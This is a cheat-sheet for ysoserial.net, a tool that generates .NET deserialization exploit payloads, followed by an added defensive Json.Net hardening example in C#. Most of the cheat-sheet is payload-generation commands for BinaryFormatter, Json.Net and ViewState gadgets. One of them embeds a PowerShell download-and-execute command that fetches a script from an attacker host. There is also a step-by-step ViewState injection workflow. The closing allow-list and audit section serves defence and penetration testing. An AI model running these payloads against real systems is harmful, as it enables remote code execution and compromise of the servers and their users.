
ysoserial.net

.NET deserialization payload generator

Description

ysoserial.net generates payloads that exploit .NET deserialization vulnerabilities. It supports multiple formatters (BinaryFormatter, ObjectStateFormatter, Json.Net, etc.) and gadget chains targeting common .NET libraries.

Installation

```bash
# Download pre-built binary from releases
# https://github.com/pwntester/ysoserial.net/releases

# Or build from source (requires Visual Studio)
git clone https://github.com/pwntester/ysoserial.net.git
# Open in Visual Studio → Build
```

Basic Usage

```bash
# List available gadgets
ysoserial.exe -l

# Generate payload (TypeConfuseDelegate gadget, BinaryFormatter)
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc.exe" -o base64

# ObjectStateFormatter (ViewState)
ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c whoami" -o base64
```

Advanced Usage

```bash
# PSObject gadget (PowerShell)
ysoserial.exe -g PSObject -f BinaryFormatter -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

# Json.Net formatter
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"

# ViewState exploitation (when MachineKey is known)
ysoserial.exe -p ViewState -g TextFormattingRunProperties \
  --decryptionalg="AES" --decryptionkey="KEY" \
  --validationalg="SHA1" --validationkey="KEY" \
  --path="/target.aspx" -c "cmd /c whoami"

# Multiple output formats
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "whoami" -o raw
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "whoami" -o base64
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "whoami" -o hex
```

Common Workflows

```bash
# .NET ViewState exploitation
# Step 1: Identify ViewState in form (hidden __VIEWSTATE field)
# Step 2: Check if MAC validation is disabled
# Step 3: Generate payload and inject

# JSON.NET deserialization
# If the app accepts JSON with $type field:
# {"$type":"System.Windows.Data.ObjectDataProvider, ...", ...}
```
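Added defensive example, not part of this cheat-sheet or of ysoserial.net: the `$type` payload above only works when the receiving Json.Net serializer honours type names, so the snippet shows that weak setting beside two hardened configurations (the `Order` DTO, `AllowListBinder` and the probe JSON are hypothetical/constructed).

```csharp
using System;
using System.Collections.Generic;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;

// Hypothetical DTO the application actually expects to receive.
public class Order { public string Id { get; set; } public int Quantity { get; set; } }

// Allow-list binder: only names registered here may be resolved from "$type".
public sealed class AllowListBinder : ISerializationBinder
{
    private readonly Dictionary<string, Type> _allowed = new Dictionary<string, Type>
    {
        ["Order"] = typeof(Order)
    };

    public Type BindToType(string assemblyName, string typeName)
    {
        if (_allowed.TryGetValue(typeName, out var t)) return t;
        // Anything else (ObjectDataProvider, delegates, ...) is refused before it is instantiated.
        throw new JsonSerializationException($"Type not permitted: {typeName}, {assemblyName}");
    }

    public void BindToName(Type serializedType, out string assemblyName, out string typeName)
    {
        assemblyName = null; typeName = serializedType.Name;
    }
}

public static class Demo
{
    // Weak: any "$type" is resolved and instantiated, which is what the ObjectDataProvider gadget relies on.
    public static readonly JsonSerializerSettings Weak =
        new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.All };

    // Hardened (preferred): "$type" is read as metadata but never resolved.
    public static readonly JsonSerializerSettings Hardened =
        new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.None };

    // Hardened alternative when polymorphism is genuinely needed: resolve only allow-listed names.
    public static readonly JsonSerializerSettings Restricted = new JsonSerializerSettings
    {
        TypeNameHandling = TypeNameHandling.Objects,
        SerializationBinder = new AllowListBinder()
    };

    public static void Main()
    {
        // Constructed probe carrying only the "$type" header from the page's example, no gadget fields.
        const string probe = "{\"$type\":\"System.Windows.Data.ObjectDataProvider, PresentationFramework\",\"Id\":\"1\"}";
        try { JsonConvert.DeserializeObject<Order>(probe, Restricted); }
        catch (JsonSerializationException e) { Console.WriteLine("blocked: " + e.Message); }
        var o = JsonConvert.DeserializeObject<Order>(probe, Hardened); // "$type" ignored, plain Order
        Console.WriteLine("parsed as Order, Id=" + o.Id);
    }
}
```

Audit for `TypeNameHandling` values other than `None` (including `Auto`, which also resolves `$type` for `object`-typed members) and for any custom binder that falls back to `Type.GetType`; the same allow-list idea applies to `SerializationBinder` on `BinaryFormatter`, though the cheat-sheet's BinaryFormatter gadgets argue for retiring that formatter rather than filtering it.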